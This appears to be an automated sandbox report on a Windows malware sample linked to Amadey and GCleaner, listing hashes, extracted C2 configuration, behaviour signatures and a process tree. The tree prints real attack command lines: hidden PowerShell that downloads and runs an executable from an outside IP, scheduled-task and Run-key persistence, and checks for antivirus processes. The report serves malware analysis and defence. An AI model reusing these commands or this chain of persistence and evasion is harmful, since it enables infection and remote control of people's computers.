Analysis

  • max time kernel
    132s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/03/2025, 20:59

General

  • Target

    2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    7f36eaec1b9d90d765a3ed4bc4d05757

  • SHA1

    56ca4cf6a18ea8ad647946d30135eae3f85e83f1

  • SHA256

    1b5b2b683f5d9e921b58f57c77da6a0d02c71c341e73d59629a4bafda8d199bc

  • SHA512

    88575f18f0a6fe6f0543066124db338eac5db12d6d9a9f4c6fcbc98fa6265e917cf33eac0702fa6a645fe857e040c88db3137e6c3dd3f9a5caf2dd2bfc3be230

  • SSDEEP

    24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8a03u:0TvC/MTQYxsWR7a03

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper: http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell with its display window hidden.

  • Downloads MZ/PE file 14 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
        "C:\Users\Admin\AppData\Local\Temp\2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn LXHBAmaYGWF /tr "mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2616
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn LXHBAmaYGWF /tr "mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2712
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2888
            • C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE
              "C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:808
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1532
                • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:844
                • C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2248
                • C:\Users\Admin\AppData\Local\Temp\10343560101\592c9e7601.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343560101\592c9e7601.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:1048
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c schtasks /create /tn mCT1BmaiGHH /tr "mshta C:\Users\Admin\AppData\Local\Temp\jZ6Fez7dX.hta" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1480
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn mCT1BmaiGHH /tr "mshta C:\Users\Admin\AppData\Local\Temp\jZ6Fez7dX.hta" /sc minute /mo 25 /ru "Admin" /f
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1096
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta C:\Users\Admin\AppData\Local\Temp\jZ6Fez7dX.hta
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1420
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UHW0YLSGVOWINEO3FDGOXHKOSTIDC7I8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:932
                      • C:\Users\Admin\AppData\Local\TempUHW0YLSGVOWINEO3FDGOXHKOSTIDC7I8.EXE
                        "C:\Users\Admin\AppData\Local\TempUHW0YLSGVOWINEO3FDGOXHKOSTIDC7I8.EXE"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:908
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\10343570121\am_no.cmd" "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1524
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 2
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:1028
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2924
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1188
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2120
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1576
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2364
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2376
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn "Q6m4DmaWTka" /tr "mshta \"C:\Temp\GSDdv6mEV.hta\"" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:748
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta "C:\Temp\GSDdv6mEV.hta"
                    8⤵
                    • Modifies Internet Explorer settings
                    PID:2192
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2824
                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2388
                • C:\Users\Admin\AppData\Local\Temp\10343630101\f91bf54e3f.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343630101\f91bf54e3f.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1032
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10343630101\f91bf54e3f.exe"
                    8⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2112
                • C:\Users\Admin\AppData\Local\Temp\10343640101\e9ddb3a424.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343640101\e9ddb3a424.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2212
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10343640101\e9ddb3a424.exe"
                    8⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    PID:2420
                • C:\Users\Admin\AppData\Local\Temp\10343650101\ac7f48816f.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343650101\ac7f48816f.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1812
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1812 -s 64
                    8⤵
                    • Loads dropped DLL
                    PID:1576
                • C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2376
                • C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2040
                • C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2388
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2188
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1816
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1420
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2716
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2664
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 418377
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2780
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Leon.cab
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1936
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "BEVERAGES" Compilation
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1232
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1368
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2828
                    • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                      Passwords.com N
                      9⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:268
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1572
                • C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:3068
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1480
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2800
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2768
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2844
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2828
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:808
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:940
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "East" Removed
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1136
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2460
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2620
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:3052
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2204
                • C:\Users\Admin\AppData\Local\Temp\10343700101\f73ae_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343700101\f73ae_003.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1412
                • C:\Users\Admin\AppData\Local\Temp\10343710101\WLbfHbp.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343710101\WLbfHbp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:1812
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1164
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3056
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1544
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:952
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1680
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2548
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2616
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1700
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2768
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2688
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2136
                • C:\Users\Admin\AppData\Local\Temp\10343720101\dBSGwVB.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343720101\dBSGwVB.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Public\Netstat\netsup.bat" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3068
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                      9⤵
                      PID:2788
        • C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe
          "C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2908

      Downloads
